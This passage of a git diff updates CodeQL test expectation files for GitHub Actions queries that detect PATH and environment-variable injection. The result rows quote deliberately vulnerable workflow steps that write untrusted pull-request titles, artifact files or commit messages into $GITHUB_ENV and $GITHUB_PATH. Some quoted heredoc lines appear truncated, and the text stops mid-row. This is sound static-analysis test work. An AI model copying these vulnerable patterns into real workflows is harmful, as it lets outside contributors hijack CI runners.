@@ -17,8 +17,8 @@ nodes | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | semmle.label | echo "::add-path::$PATHINJ" | subpaths #select -| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | -| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | -| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | -| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | -| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user. | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | +| .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:13:21:13:58 | github.event.pull_request.title | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:14:14:14:52 | echo $(echo "$PATHINJ") >> $GITHUB_PATH | echo $(echo "$PATHINJ") >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:16:21:16:58 | github.event.pull_request.title | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:17:14:17:42 | echo $PATHINJ >> $GITHUB_PATH | echo $PATHINJ >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:19:21:19:58 | github.event.pull_request.title | .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/path1.yml:20:14:20:44 | echo ${PATHINJ} >> $GITHUB_PATH | echo ${PATHINJ} >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:21:9:25:6 | Uses Step | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:25:14:25:50 | echo "$(cat foo/bar)" >> $GITHUB_PATH | echo "$(cat foo/bar)" >> $GITHUB_PATH | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:28:21:28:58 | github.event.pull_request.title | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | Potential PATH environment variable injection in $@, which may be controlled by an external user ($@). | .github/workflows/path1.yml:29:14:29:40 | echo "::add-path::$PATHINJ" | echo "::add-path::$PATHINJ" | .github/workflows/path1.yml:4:3:4:21 | pull_request_target | pull_request_target | diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected index a79053f2240e..9914ae91df12 100644 --- a/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjectionCritical.expected 
@@ -93,39 +93,39 @@ nodes | .github/workflows/test16.yml:18:14:20:77 | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | semmle.label | # VULNERABLE\necho "PR_NUMBER=$(cat pr_number.txt \| tr ',' '\\n')" >> $GITHUB_ENV\n | subpaths #select -| .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | .github/workflows/artifactpoisoning51.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning51.yml:19:14:20:57 | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | echo "pr_number=$(cat foo/bar)" >> $GITHUB_ENV\n | -| .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/artifactpoisoning52.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/artifactpoisoning52.yml:19:14:22:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\ncat foo >> "$GITHUB_ENV"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/artifactpoisoning53.yml:13:9:15:6 | Run Step | .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/artifactpoisoning53.yml:18:14:23:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | .github/workflows/test2.yml:12:9:41:6 | Uses Step | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test2.yml:41:14:43:52 | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | unzip pr.zip\necho "pr_number=$(cat NR)" >> $GITHUB_ENV\n | -| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | .github/workflows/test3.yml:13:7:20:4 | Uses Step | .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test3.yml:20:12:23:77 | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | echo "PR_NUMBER=$(cat pr_number.txt \| jq -r .)" >> $GITHUB_ENV\necho "PR_HEAD_REPO=$(cat pr_head_repo.txt \| jq -Rr .)" >> $GITHUB_ENV\necho "PR_HEAD_REF=$(cat pr_head_ref.txt \| jq -Rr .)" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | .github/workflows/test4.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:12:14:13:48 | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | echo "PR_TITLE=$TITLE" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | .github/workflows/test4.yml:15:19:15:56 | github.event.pull_request.title | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:16:14:17:50 | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | echo "PR_TITLE=${TITLE}" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | .github/workflows/test4.yml:19:19:19:56 | github.event.pull_request.title | .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:20:14:21:54 | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | echo PR_TITLE=$(echo $TITLE) >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | .github/workflows/test4.yml:23:19:23:56 | github.event.pull_request.title | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:24:14:27:36 | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | echo "PR_TITLE<> $GITHUB_ENV\necho "$TITLE" >> $GITHUB_ENV\necho "EOF" >> $GITHUB_ENV\n | -| .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | .github/workflows/test4.yml:29:19:29:56 | github.event.pull_request.title | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:30:14:33:40 | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | echo "PACKAGES_FILE_LIST<> "${GITHUB_ENV}"\necho "$TITLE" >> "${GITHUB_ENV}"\necho "EOF" >> "${GITHUB_ENV}"\n | -| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | .github/workflows/test4.yml:35:19:35:56 | github.event.pull_request.title | .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:36:14:41:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | -| .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | .github/workflows/test4.yml:43:19:43:56 | github.event.pull_request.title | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:44:14:47:14 | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | cat <<-EOF >> "$GITHUB_ENV"\nFOO=$TITLE\nEOF\n | -| .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | .github/workflows/test4.yml:57:27:57:64 | github.event.pull_request.title | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test4.yml:55:14:55:70 | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | echo "BRANCH=$(echo ${TARGET_BRANCH##*/})" >> $GITHUB_ENV | -| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | .github/workflows/test4.yml:60:19:60:56 | github.event.pull_request.title | .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test4.yml:58:14:58:94 | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | echo ISSUE_KEY=$(echo "${TITLE}" \| grep -oP 'ISPN-(?P[0-9]+)') >> $GITHUB_ENV | -| .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | .github/workflows/test5.yml:10:9:30:6 | Uses Step | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test5.yml:33:14:36:62 | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | echo "PR_NUM=$(cat coverage/pr_num.txt)" >> $GITHUB_ENV\necho "BASE=$(cat coverage/base.txt)" >> $GITHUB_ENV\necho "HEAD=$(cat coverage/head.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | .github/workflows/test6.yml:11:19:11:56 | github.event.pull_request.title | .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test6.yml:12:14:14:46 | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | FOO=${TITLE##*/}\necho PR_TITLE=${FOO} >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | .github/workflows/test6.yml:16:19:16:56 | github.event.pull_request.title | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:17:14:19:44 | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | FOO=$TITLE+\necho PR_TITLE=$FOO >> $GITHUB_ENV\n | -| .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | .github/workflows/test6.yml:21:19:21:56 | github.event.pull_request.title | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test6.yml:22:14:24:52 | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | venv="$(echo $TITLE)')"\necho "VIRTUAL_ENV=${venv}" >> $GITHUB_ENV\n | -| .github/workflows/test7.yml:16:9:24:35 | Uses Step | .github/workflows/test7.yml:9:9:16:6 | Uses Step | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test7.yml:16:9:24:35 | Uses Step | Uses Step | -| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:31:14:33:41 | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | foo=$(cat ./artifacts/parent-artifacts/event.txt)\necho "foo=$foo" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test8.yml:35:14:36:82 | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(cat ./artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | .github/workflows/test8.yml:24:9:30:6 | Uses Step | .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test8.yml:38:14:39:79 | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | echo "foo=$(< /artifacts/parent-artifacts/event.txt)" >> $GITHUB_ENV\n | -| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | .github/workflows/test9.yml:19:9:27:6 | Uses Step | .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test9.yml:29:14:41:41 | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | pr_num=$(jq -r '.pull_request.number' artifacts/event_file/event.json)\nif [ -z "$pr_num" ] \|\| [ "$pr_num" == "null" ]; then\n pr_num=""\nfi\n\nref=$pr_num\nif [ -z "$ref" ] \|\| [ "$ref" == "null" ]; then\n ref=${{ github.ref }}\nfi\n\necho "pr_num=$pr_num" >> $GITHUB_ENV\necho "ref=$ref" >> $GITHUB_ENV\n | -| .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | .github/workflows/test10.yml:20:9:26:6 | Uses Step | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test10.yml:27:14:27:59 | cat foo/.github/java-config.env >> $GITHUB_ENV | cat foo/.github/java-config.env >> $GITHUB_ENV | -| .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test11.yml:15:9:21:6 | Uses Step | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test11.yml:23:14:28:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test12.yml:48:14:53:29 | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | {\n echo 'RUNTIME_VERSIONS<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:38:9:46:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | .github/workflows/test12.yml:55:9:61:6 | Uses Step | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test12.yml:63:14:68:29 | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | {\n echo 'PRERELEASE_REPORT<> "$GITHUB_ENV"\n | -| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test13.yml:18:14:20:65 | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | COMMIT_MESSAGE=$(git log --format=%s)\necho "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV\n | -| .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test13.yml:22:14:23:70 | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | echo "COMMIT_MESSAGE=$(git log --format=%s)" >> $GITHUB_ENV\n | -| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
| .github/workflows/test14.yml:14:14:15:122 | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | echo "CHANGED-FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)" >> "$GITHUB_ENV"\n | -| .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test14.yml:24:14:26:57 | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | FILES=$(git diff-tree --no-commit-id --name-only -r ${{ github.sha }} -- docs/)\necho "CHANGED-FILES=${FILES}" >> "$GITHUB_ENV"\n | -| .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | .github/workflows/test15.yml:11:14:12:98 | echo "BODY=$(jq --raw-output .pull_request.body ${GITHUB_EVENT_PATH})" >> "$GITHUB_ENV"\n | Potential environment variable injection in $@, which may be controlled by an external user. 
